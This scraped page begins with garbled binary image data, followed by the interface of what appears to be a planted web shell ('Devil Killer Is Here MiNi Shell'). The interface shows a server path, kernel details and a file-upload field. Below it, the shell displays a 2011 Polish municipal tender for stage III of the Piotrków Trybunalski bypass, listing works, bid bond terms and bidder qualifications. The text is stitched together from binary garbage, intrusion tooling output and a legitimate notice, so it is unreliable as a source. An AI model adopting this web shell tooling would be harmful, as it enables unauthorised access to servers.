JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110214/21270-N-2011.html

<p class="kh_header"><b>Piotrków Trybunalski: Budowa obwodnicy Miasta Piotrkowa Trybunalskiego - III etap</b><br>
<b>Numer ogłoszenia: 21270 - 2011; data zamieszczenia: 14.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Piotrków Trybunalski , ul. Pasaż Rudowskiego 10, 97-300 Piotrków Trybunalski, woj. łódzkie, tel. 044 7327796, faks 044 7327798.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.piotrkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa obwodnicy Miasta Piotrkowa Trybunalskiego - III etap.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:

Budowa obwodnicy Miasta Piotrkowa Trybunalskiego - III etap

Zakres rzeczowy obejmuje :

I.	Roboty drogowe:

- Budowa drogi gminnej zbiorczej w ciągu trasy N-S od km 0+000,00 do km 0+297,15  na odcinku od ulicy Słowackiego do projektowanego połączenia                z przedłużeniem  ulicy Modrzewskiego do ulicy Źródlanej (od km 0+000,00 do km 0+146,38) w Piotrkowie Tryb. wraz z budową miejsc postojowych, zjazdów gospodarczych, chodnika i ścieżki rowerowej:

  1.	Jezdnia bitumiczna szerokości 7,00 m                                    o nawierzchni z SMA	4 880,40 [m2]
  2.	Krawężniki betonowe 20 x 30 cm	1 196,00 [m]
  3.	Zjazdy z kostki betonowej grafitowej	          53,70 [m2]
  4.	Zatoka postojowa z kostki betonowej czarnej	   172,60 [m2]
  5.	Chodniki z kostki betonowej szarej 	   977,60  [m2]
  6.	Ścieżka rowerowa z kostki betonowej bezfazowej czerwonej 	  763,60 [m2]
  7.	Obrzeża betonowe 30 x 8cm	       1 198,00 [m]
  8.	Odwodnienie korpusu drogowego - dren z rury PCV perforowanej śr. 150 mm 	648,00 [m]
  9.	Oznakowanie poziome	574,44 [m2]
10.	Oznakowanie poziome - symbole	142,12 [m2]
11.	 Mechaniczne ścinanie drzew z karczowaniem	44  [szt.]
12.	Pionowe znaki drogowe (znaki wykonane z folii odblaskowej min. II generacji)	51  [szt.]
13.	Słupki U-5a	3 [szt.]
14.	Mechaniczne karczowanie krzaków i podszyć	0,314 [ha]
15.	Mechaniczne rozplantowanie humusu	5 681,90 [m2]
16.	Humusowanie skarp z obsianiem trawą	2 640,00 [m2]



II.	Roboty instalacyjne

- Kanalizacja deszczowa

1.	Kanał deszczowy z rur PVC SN8 lity przekrój rury 500x14,6 SN8 wraz z kształtkami, (podsypka piaskowa 20cm, obsypka piaskowa 20cm nad wierzch rury),	284 [mb] 
2.	Kanał deszczowy z rur PVC SN8 lity przekrój rury 400x11,7 SN8 wraz z kształtkami, (podsypka piaskowa 20cm, obsypka piaskowa 20cm nad wierzch rury),	223 [mb]
3.	Kanał deszczowy z rur PVC SN8 lity przekrój rury 315x9,2 SN8 wraz z kształtkami, (podsypka piaskowa 20cm, obsypka piaskowa 20cm nad wierzch rury),	26 [mb]
4.	Kanał deszczowy z rur PVC SN8 lity przekrój rury 250x7,3 SN8 wraz z kształtkami, (podsypka piaskowa 20cm, obsypka piaskowa 20cm nad wierzch rury),	14 [mb]
5.	Przykanaliki do wpustów i posesji (w pasie drogowym) z rur PVC SN8 lity przekrój rury 200x5,7 SN8 wraz z kształtkami, (podsypka piaskowa 20cm, obsypka piaskowa 20cm nad wierzch rury),	152,7 [mb]
6.	Wykonanie studni rewizyjnych żelbetowych na kanalizacji deszczowej z zabezpieczeniem przeciwwilgociowym, kręgi łączone na uszczelkę, właz z wypełnieniem betonowym klasy D400 z trwale osadzona uszczelką, z przejściami szczelnymi wykonanymi przez producenta studni 1200,	3 [kpl]
7.	Wykonanie studni rewizyjnych żelbetowych na kanalizacji deszczowej z zabezpieczeniem przeciwwilgociowym, kręgi łączone na uszczelkę, właz z wypełnieniem betonowym klasy D400 z trwale osadzona uszczelką, z przejściami szczelnymi wykonanymi przez producenta studni 1500, w tym osadnikowe	27 [kpl]
8.	Separator substancji ropopochodnych koalescencyjny ESK-NG-30 lub równoważny	1 [kpl]
9.	Osadnik na kanalizacji deszczowej, właz z wypełnieniem betonowym klasy D400 z trwale osadzona uszczelką, z przejściami szczelnymi wykonanymi przez producenta 1500	1 [kpl]
10.	Wykonanie studzienek ściekowych betonowych O500 z zabezpieczeniem przeciwwilgociowym, z osadnikiem, z wpustem klasy D400	19 [kpl]
11.	Wykonanie wylotu do rowu otwartego wraz z zaworem zwrotnym klapowym 	1 [kpl]
12.	Regulatory przepływu 	3	[kpl]


- Przebudowa wodociągu

1.	Podłączenie wodociągu do istniejącej sieci wodociągowej	2 [kpl.]
2.	Ułożenie przewodów wodociągowych z rur polietylenowych PN16, TS PE100, SDR11 160x14,6	39 [mb]
3.	Ułożenie przewodów wodociągowych z rur polietylenowych PN16, PE100,  SDR17 315 jako rury osłonowe, wraz z płozami, manszetami	19,3 [mb]
5.	Zasuwy z żeliwa sferoidalnego, kołnierzowe z miękkim uszczelnieniem klina, DN150, PN16 wraz z obudową i skrzynką uliczną, śruby ze stali nierdzewnej	2 + 2 [kpl.]
6.	Rury dwudzielne stalowe ocynkowane DN400 wraz z płozami, manszetami	10 [mb]



III.	     Roboty elektryczne - usunięcie kolizji z liniami energetycznymi  i telekomunikacyjnymi 

- Sygnalizacja świetlna
- Skablowanie linii napowietrznej nn
- Oświetlenie drogi

Zakres prac elektroinstalacyjnych:
1.	Skablowanie istniejącej linii napowietrznej n.n. - odcinek między słupami S4 - S6 wraz z wymianą i przestawieniem słupa S4; kabel YAKXS 4x120+35 mm2;
2.	Osłonięcie istniejącego kabla 15 kV rurą dwudzielną SRS 160, ułożenie rury zapasowej tej samej średnicy;
3.	Odtworzenie zdemontowanego oświetlenia (lampa na S4 + słup z lampą w miejsce S5;
4.	Oświetlenie drogowe trasy N-S i odcinka ul. Modrzewskiego zrealizowanego linią kablową YAKXS 4x35 mm2.
5.	Rozbudowa i uruchomienie istniejącej sygnalizacji świetlnej o północny dwujezdniowy wylot trasy wraz z wymianą sterownika.
6.	Towarzyszące powyższemu, opisanemu w dokumentacji zakresowi prac demontaże.

Uwaga: Przedmiary należy czytać łącznie z dokumentacjami technicznymi i Specyfikacjami 
              Technicznymi Wykonania i Odbioru.

Szczegółowy zakres prac opisują dokumentacje i przedmiary.

1.	Wykonawca w ramach swojego wynagrodzenia własnym staraniem i nakładem kosztów uzyskuje obsługę przez Zakład Energetyczny.
2.	Zadanie winien wykonywać zespół , którego członkowie muszą posiadać kwalifikacje w zakresie eksploatacji sieci E. 

Inwestor dopuszcza stosowanie innego typu osprzętu i wyposażenia niż                  w dokumentacji pod warunkiem zachowania tych samych danych technicznych            i standardów jakościowych elementów wskazanych dokumentacją                              i przedmiarami. Oferta winna podać typy proponowanego osprzętu                             i wyposażenia jak powyżej.

IV.	Roboty rozbiórkowe

- Rozbiórka budynku mieszkalnego o pow. zabudowy -  115,64 m2 .
- Rozbiórka budynku gospodarczego o pow. zabudowy -  25,00 m2 .

Roboty rozbiórkowe należy prowadzić ręcznie oraz przy użyciu specjalistycznego sprzętu z zachowaniem szczególnej ostrożności.
Materiały sypkie z rozbieranych budynków winno usuwać się za pomocą rynien - rękawów do kontenerów.

V.	Roboty towarzyszące (przygotowawcze, ziemne)

W wycenie należy uwzględnić również:

- Roboty pomiarowe, cięcie nawierzchni, rozbiórkowe, wywóz gruzu na składowisko,
- Wykopy wąsko przestrzenne o pionowych ścianach, w pełni umocnione,
- Pełna wymiana gruntu pod terenami utwardzonymi - jezdnie, chodniki, ścieżki rowerowe, zatoki, zjazdy,
- Odtworzenie nawierzchni, w tym nawierzchni gruntowych i bitumicznych, po wykonywanych pracach, jak również podczas używania ciężkiego sprzętu,
- Zabezpieczenie istniejącego uzbrojenia rurami osłonowymi oraz bieżące ich inwentaryzowanie na trasie budowanych sieci,
- Regulacja istniejącej armatury,
- Oznakowanie wodociągu, 
- Oznakowanie ulic na czas budowy jak również wykonanie docelowego oznakowania ulic, zgodnie z zatwierdzonym projektem,
- W wycenie przebudowy sieci wodociągowej uwzględnić koszty związane                             z wykonaniem niezbędnych badań, prób, dezynfekcji itp., w wycenie budowy kanalizacji deszczowej uwzględnić koszty związane z próbą wodną ułożonych kanałów.
- Przeprowadzenie kamerą inspekcyjną inspekcji wszystkich wykonanych kanałów                 i przykanalików po ich ułożeniu oraz dodatkowo przed wykonywaniem warstw bitumicznych, dołączenie raportu do dokumentów odbiorowych (Koszt ułożenia kanałów deszczowych wycenić wraz z ceną ich podwójnej inspekcji),
- Zabezpieczenie gniazd lęgowych.
Przedmiotem zamówienia jest całość robót przewidzianych w ww. projekcie.

	W zakres przedmiotu zamówienia wchodzi także:
-	zapewnienie obsługi geologicznej i kompleksowej obsługi geodezyjnej inwestycji oraz wykonanie geodezyjnej inwentaryzacji powykonawczej przez uprawnionego geodetę, opracowanie dokumentacji powykonawczej                           w 4 egzemplarzach w każdej branży, na koszt własny,
-	uzyskanie koniecznych zezwoleń i uiszczenie opłat u zarządców dróg na zajęcie pasa drogowego na czas robót,
-	właściwe oznakowanie dróg na czas budowy, zgodnie z zatwierdzonym projektem czasowej organizacji ruchu, zabezpieczenie wykopów przed dostępem osób trzecich, wykonanie przejść dla pieszych ,
-	dostarczenie, zainstalowanie i obsługa wszystkich tymczasowych urządzeń zabezpieczających takich jak: zapory, światła ostrzegawcze, sygnały, ogrodzenia, poręcze itp. niezbędne do ochrony robót, zapewniające bezpieczeństwo pojazdów i pieszych,
-	zapewnienie dojść do posesji,
-	odtworzenie nawierzchni dróg i wjazdów do stanu pierwotnego, a w przypadku, gdy projekt drogowy przewiduje inne niż dotychczasowe zagospodarowanie terenu - doprowadzenie do stanu projektowanego,
-	wykonanie koniecznych badań zagęszczenia gruntu celem odtworzenia                      i odbudowy nawierzchni drogowych zgodnie z Polską Normą: Drogi samochodowe. Roboty ziemne. Wymagania i badania PN-S-02205 Wskaźniki zagęszczenia gruntu oznaczyć zgodnie z normą BN-77/8931-12,
-	wykonawca odpowiada za ochronę instalacji na powierzchni ziemi i za urządzenia podziemne, takie jak rurociągi, kable itp. oraz uzyska od odpowiednich władz będących właścicielami tych urządzeń potwierdzenie informacji dostarczonych mu przez Zamawiającego w ramach planu ich lokalizacji. Wykonawca zapewni właściwe oznaczenie i  zabezpieczenie przed uszkodzeniem tych instalacji i urządzeń w czasie trwania budowy,
-	wykonawca zobowiązany jest umieścić w swoim harmonogramie rezerwę czasową dla wszelkiego rodzaju robót, które mają być wykonane w zakresie przełożenia instalacji i urządzeń podziemnych na terenie budowy i powiadomić inspektora nadzoru i władze lokalne o zamiarze rozpoczęcia robót. O fakcie przypadkowego uszkodzenia tych instalacji Wykonawca bezzwłocznie powiadomi inspektora nadzoru i zainteresowane władze oraz będzie z nimi współpracował dostarczając wszelkiej pomocy potrzebnej przy dokonywaniu napraw. Wykonawca będzie odpowiadać za wszelkie spowodowane przez jego działania uszkodzenia instalacji na powierzchni ziemi i urządzeń podziemnych wykazanych w dokumentach przekazanych mu przez Zamawiającego.

UWAGA : Koszty zabezpieczenia terenu budowy wchodzą w zakres umowny  
     i nie podlegają odrębnej zapłacie.

WYMAGANIA OGÓLNE WYKONANIA ROBÓT:

- Przed przystąpieniem do przetargu należy dokonać wizji lokalnej obiektu 
w miejscu realizacji zamówienia
- Wszystkie roboty winny być prowadzone zgodnie z prawem budowlanym. 

UWAGA ! Zamówienie należy wykonać ściśle wg projektu, oraz zgodnie ze Szczegółową Specyfikacją Techniczną wykonania i odbioru robót.

- Wszystkie materiały użyte do budowy muszą posiadać: 
- Certyfikat na znak bezpieczeństwa wykazując, że zapewniono zgodność                    z kryteriami właściwych przepisów i dokumentów technicznych.
- Deklarację zgodności lub certyfikat zgodności z: Polską Normą, Normą Europejską lub Aprobatą Techniczną  w przypadku wyrobów, dla których nie ustanowiono normy, jeżeli nie są objęte certyfikacją. 
- Oświadczenia kierownika budowy i kierowników robót, że wyroby budowlane zostały dopuszczone do stosowania w budownictwie i posiadały odpowiednie oznakowania B lub CE oraz załączoną informację o wyrobie.

Rozpoczęcie prac należy zgłosić do odpowiednich jednostek - gestorów sieci, celem poinformowania o w/w robotach i czasie ich trwania.
-  Włączenie wodociągu do sieci miejskiej wykonać w uzgodnieniu z PWiK.
- Włączenie kanału deszczowego do sieci miejskiej wykonać                              w uzgodnieniu z Miejskim Zarządem Dróg i Komunikacji w Piotrkowie Tryb.
- Podczas realizacji robót Wykonawca będzie przestrzegać przepisów dotyczących bezpieczeństwa i higieny pracy zgodnie z rozporządzeniem Ministra Infrastruktury z dn. 6 lutego 2003 r. w sprawie bezpieczeństwa i higieny pracy podczas wykonywania robót budowlanych (Dz. U. z 2003 r. Nr 47, poz. poz.401)
 - Warunkiem koniecznym dla prawidłowego przygotowania oferty przetargowej jest zapoznanie się z dokumentacją techniczną dotyczącą przedmiotowego zamówienia oraz Specyfikacjami Technicznymi Wykonania i Odbioru Robót. 

UWAGA:   

 Wyłoniony w niniejszym przetargu Wykonawca będzie zobowiązany do :

I.	udzielenia na wykonane roboty gwarancji na okres min. 5 lat, licząc od 
    dnia odbioru robót.

II .   zabezpieczenia zieleni , zgodnie z uzgodnieniami pomiędzy Urzędem 
     Miasta a właścicielami posesji, na których będą przeprowadzane rozbiórki 
     budynków.

III. uwzględnienia w organizacji robót kolizji z prowadzonymi pracami dotyczącymi rozbudowy kanalizacji deszczowej z obwodnicy miasta                      w kierunku ulicy Słowackiego (strona wschodnia i zachodnia)

           IV.   załączenia do dokumentacji odbiorowej, najpóźniej w dniu odbioru, 
     powykonawczą mapę inwentaryzacyjną, zawierającą w komplecie załącznik 
     w postaci wykazu pomiarów, potwierdzoną przez uprawnionego geodetę. 

Obowiązującą formą wynagrodzenia jest wynagrodzenie ryczałtowe. 

Wykonawca jest zobowiązany przed zawarciem umowy do przedstawienia Zamawiającemu: 
- kosztorysów ofertowych wykonanych metodą uproszczoną, na każdą                  z wymienionych w istotnych postanowieniach  umowy branż robót, będących podstawą sporządzenia oferty oraz harmonogramu rzeczowo-finansowego realizacji robót do akceptacji,
- oświadczenia o wykonywaniu robót siłami własnymi lub z udziałem podwykonawców, których odpowiednie dokumenty powinna zawierać oferta.

Przed przystąpieniem do robót wykonawca zobowiązany będzie do inwentaryzacji stanu technicznego budynków znajdujących się w strefie oddziaływania robót. Wykonawca będzie odpowiedzialny za szkody powstałe w przyległych budynkach i na graniczących z inwestycją terenach, a związane z prowadzonymi robotami..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.00-1, 45.00.00.00-7, 45.10.00.00-8, 45.23.00.00-8, 45.23.13.00-8, 45.23.14.00-9, 45.23.32.12-6, 45.23.32.21-4, 45.23.32.22-1, 45.31.60.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu Zamawiający żąda wniesienia wadium.
1.	Wykonawca zobowiązany jest do wniesienia wadium do dnia 01.03.2011 r. do godz. 9:00 w wysokości 80.000,00 zł. 
2.	Wadium może być wniesione w następujących formach:
a)	pieniądzu wpłaconym przelewem na rachunek bankowy BGŻ O/Piotrków Tryb. Nr : 05203000451110000000261430 Uwaga: Na poleceniu przelewu należy zamieścić adnotację : Wadium - przetarg nieograniczony na: BUDOWĘ OBWODNICY MIASTA PIOTRKOWA TRYBUNALSKIEGO - III ETAP,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007r. Nr 42 poz. 275).
3.	Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za wniesione w terminie tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że środki zostały zaksięgowane na koncie Zamawiającego przed upływem terminu składania ofert.
4.	Oryginał poręczeń i gwarancji należy przekazać za pokwitowaniem do Referatu Zamówień Publicznych w Urzędzie Miasta, do pokoju nr 317 przed terminem składania ofert, a do oferty załączyć kserokopię. 
5.	Wykonawca, który nie wniesie wadium w wyznaczonym terminie zostanie wykluczony. Terminowe wniesienie wadium (w każdej z dopuszczonych form jego wniesienia) Zamawiający sprawdzi w ramach własnych czynności proceduralnych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia wymaganych warunków odbywa się, zgodnie z regułą: spełnia albo nie spełnia, na podstawie dokumentów załączonych do oferty, przez Wykonawcę, zgodnych z niniejszą SIWZ. Niespełnienie, chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W szczególności wykonawca musi spełniać następujący warunek:

a)	wykonać w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej:
- dwie prace polegające na budowie lub przebudowie drogi o wartości minimum 1.500.000,00 zł brutto każda,
- dwie prace polegające na budowie, przebudowie, rozbudowie kanalizacji deszczowej o wartości minimum 500.000,00 zł brutto każda,
- dwie prace polegające na budowie zewnętrznych sieci średniego lub niskiego napięcia, napowietrznych i kablowych o wartości nie mniejszej niż 80.000,00 zł brutto każda,
- dwie prace polegające na budowie kompletnej świetlnej sygnalizacji drogowej wartości nie mniejszej niż 50.000,00 zł brutto każda   - wg załącznika nr 4;

	Wszystkie ww. realizacje nie muszą być wykonane na jednym zadaniu.

Ocena spełnienia wymaganych warunków odbywa się, zgodnie z regułą: spełnia albo nie spełnia, na podstawie dokumentów załączonych do oferty przez Wykonawcę, zgodnych z niniejszą SIWZ. Niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia wymaganych warunków odbywa się, zgodnie z regułą: spełnia albo nie spełnia, na podstawie dokumentów załączonych do oferty, przez Wykonawcę, zgodnych z niniejszą SIWZ. Niespełnienie, chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W szczególności wykonawca musi spełniać następujące warunki:

- wskazać osoby, które będą uczestniczyć w charakterze kierownika budowy                         i kierowników robót w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakres wykonywanych przez nich czynności, oraz informacją o podstawie do dysponowania tymi osobami. Osoby te muszą posiadać uprawnienia do pełnienia samodzielnej funkcji technicznej w budownictwie o specjalności: konstrukcyjno  - budowlanej w zakresie budowy dróg, konstrukcyjno  - budowlanej w zakresie robót rozbiórkowych, instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych, elektroinstalacyjne w zakresie dozoru D (bez ogr. napięcia; do 20 kV) , zespół musi posiadać kwalifikacje w zakresie eksploatacji sieci E, posiadające aktualne zaświadczenie z Okręgowej Izby Inżynierów Budownictwa.
W celu udokumentowania, że ww. osoby spełniają powyższe wymagania Wykonawca składa oświadczenie zawarte w załączniku nr 3.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W szczególności wykonawca musi spełniać następujący warunek:
a)	przedstawi informację z banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy na sumę min. 1.000.000,00 zł brutto, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
